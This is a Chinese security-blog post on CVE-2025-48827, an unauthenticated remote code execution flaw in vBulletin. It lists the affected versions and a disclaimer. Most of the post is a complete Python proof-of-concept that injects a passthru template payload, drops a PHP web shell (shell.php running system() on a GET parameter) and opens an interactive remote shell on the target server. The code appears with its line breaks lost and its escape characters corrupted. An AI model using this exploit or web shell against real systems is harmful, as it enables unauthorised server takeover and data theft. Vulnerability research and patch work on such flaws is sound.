0x00 前言
vBulletin是一个强大,灵活并可完全根据自己的需要定制的商业论坛程序(非开源),它使用PHP脚本语言编写,并且基于以高效和高速著称的数据库引擎MySQL。
0x01 漏洞描述
调用受保护的API控制器replaceAdTemplat执行未授权的操作,从而执行任意代码。
0x02 CVE编号
CVE-2025-48827
0x03 影响版本
5.0.0 <= vBulletin < 5.7.6
6.0.0 <= vBulletin < 6.0.4
0x04 漏洞详情
POC:
https://github.com/0xgh057r3c0n/CVE-2025-48827
#!/usr/bin/env python3import requestsimport sysimport urllib3import re# Suppress InsecureRequestWarningurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)# ANSI ColorsRED = "�33[31m"GREEN = "�33[32m"YELLOW = "�33[33m"BLUE = "�33[34m"CYAN = "�33[36m"BOLD = "�33[1m"RESET = "�33[0m"def banner():print(CYAN + BOLD + r"""__________ .__ .__ __ .__ ___________________ _______>___ _______ __ __| | | | _____/ |_|__| __________ _ ___ \_ __>/ /| | _/ | | | | _/ __ __ |/ | _/ / | _>/ | | | / |_| |_ ___/| | | | | | ____| >_/ |______ /____/|____/____/___ >__| |__|___| /____|_ /______ /______>/ / / / / >vBulletin RCE - Web Shell Dropper by 0xgh057r3c0n""" + RESET)def usage(script):print(YELLOW + f"nUsage: python3 {script} <URL>")print(f"Example: python3 {script} http://target/vb/n" + RESET)sys.exit(1)def error_exit(msg):print(RED + f"[-] Error: {msg}n" + RESET)sys.exit(1)def info(msg):print(YELLOW + f"[!] {msg}" + RESET)def success(msg):print(GREEN + f"[+] {msg}" + RESET)def inject_rce_template(session, target):inject_data = {"routestring": "ajax/api/ad/replaceAdTemplate","styleid": "1","location": "rce","template": '<vb:if condition='"passthru"($_POST["cmd"])'> </vb:if>'}r = session.post(target, data=inject_data, verify=False)if r.text.strip() != "null":error_exit("Template injection failed.")success("RCE payload injected.")def drop_shell(session, target):shell_code = '<?php if(isset($_GET["cmd"])){echo "<pre>"; system($_GET["cmd"]); echo "</pre>";} ?>'cmd = f"echo {shell_code!r} > shell.php"drop_data = {"routestring": "ajax/render/ad_rce","styleid": "1","location": "rce","cmd": cmd}session.post(target, data=drop_data, verify=False)success(f"shell.php dropped at: {target}shell.php")info("Launch commands like:")print(f" curl '{target}shell.php?cmd=whoami'n")def run_command(session, target, cmd):data = {"routestring": "ajax/render/ad_rce","styleid": "1","location": "rce","cmd": cmd}r = session.post(target, data=data, verify=False)if r.status_code != 200:print(RED + f"[-] HTTP error: {r.status_code}" + RESET)return None# Always show full response for debugprint(YELLOW + "[DEBUG] Full response:n" + RESET + r.text)match = re.search(r"<pre>(.*?)</pre>", r.text, re.DOTALL)if match:return match.group(1).strip()else:return Nonedef interactive_shell(session, target):cwd = "."info("Entering interactive mode (type 'exit' to quit)")while True:try:user_input = input(f"{BOLD}{BLUE}(shell:{cwd})$ {RESET}").strip()except (KeyboardInterrupt, EOFError):print("n" + YELLOW + "[!] Exiting interactive shell." + RESET)breakif user_input.lower() == "exit":breakif user_input.startswith("cd "):path = user_input[3:].strip()cmd = f"cd {cwd} && cd {path} && pwd"output = run_command(session, target, cmd)if output:cwd = outputelse:print(RED + "[-] Directory change failed." + RESET)continuecmd = f"cd {cwd} && {user_input}"output = run_command(session, target, cmd)if output:print(GREEN + output + RESET)else:print(RED + "[-] No output or command failed." + RESET)def main():banner()if len(sys.argv) != 2:usage(sys.argv[0])target = sys.argv[1].rstrip('/') + '/'session = requests.Session()try:inject_rce_template(session, target)drop_shell(session, target)interactive_shell(session, target)except requests.exceptions.RequestException as e:error_exit(f"Request error: {e}")if __name__ == "__main__":main()
0x05 参考链接
https://kevintel.com/CVE-2025-48827
https://github.com/0xgh057r3c0n/CVE-2025-48827
原文始发于微信公众号(信安百科):CVE-2025-48827|vBulletin远程代码执行漏洞(POC)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论